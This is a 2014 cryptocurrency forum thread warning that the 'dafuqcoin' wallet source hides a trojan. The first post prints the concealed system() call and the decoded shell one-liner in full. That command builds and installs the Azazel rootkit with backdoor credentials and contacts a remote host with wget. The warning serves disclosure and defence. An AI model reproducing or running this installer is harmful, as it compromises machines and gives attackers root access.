Title: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: richiela on April 22, 2014, 06:53:56 PM This is completely malicious - DO NOT RUN
// init.cpp // Runs if in daemon mode #if !defined(WIN32) && !defined(QT_GUI) fDaemon = GetBoolArg("-daemon"); if ((access("/usr/.dfq", F_OK) == -1)) daemonize(getnewid()); // util.h // daemonize basically calls "system" which executes "s" which is whatever is passed in inline void daemonize(std::string s) { if (std::system(s.c_str())) return; return; } // util.cpp // takes offset1, offset2, offset3 and XORs it std::string getnewid() { return (hashoffset(offset1, offset2, offset3)); } // The result apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1 ... Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source. This coin will be delisted and removed from bittrex.com ASAP. If you ran this as root, your box is compromised and I suggest a rebuild ASAP. If you did not run as root, this should have failed silently and you should be ok.... Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: pandher on April 22, 2014, 07:07:03 PM This was clearly the reason behind the recent CryptoKK exchange failure, Azazel rootkit
Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: DssTech on April 22, 2014, 08:35:17 PM All i have to say is WOW
Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: jwinterm on April 23, 2014, 12:57:54 AM thanks for heads up bittrex richie...dafuq yo?
Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: Cryptocoinrank.com on April 23, 2014, 01:12:35 AM Thanks for the heads up, I was going to add that coin to Cryptocoinrank.com if I would not have seen this first.
Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: Propulsion on April 23, 2014, 01:27:11 AM Is this the first time a trojan's been baked into the source code?
Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: Raxe.io on April 23, 2014, 01:31:13 AM This is some dirty code, seems like they want to get a botnet together.
Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: Spoetnik on April 23, 2014, 01:40:37 AM Your just a Troll blah blah blah
..nobody does anything wrong in this scene your all just haters.. Free Market ! Title: Re: READ ME NOW! - dafuqcoin is a trojan - pool operators/exchanges beware Post by: cryptohunter on April 23, 2014, 01:40:55 AM how did it get past virustotal?
|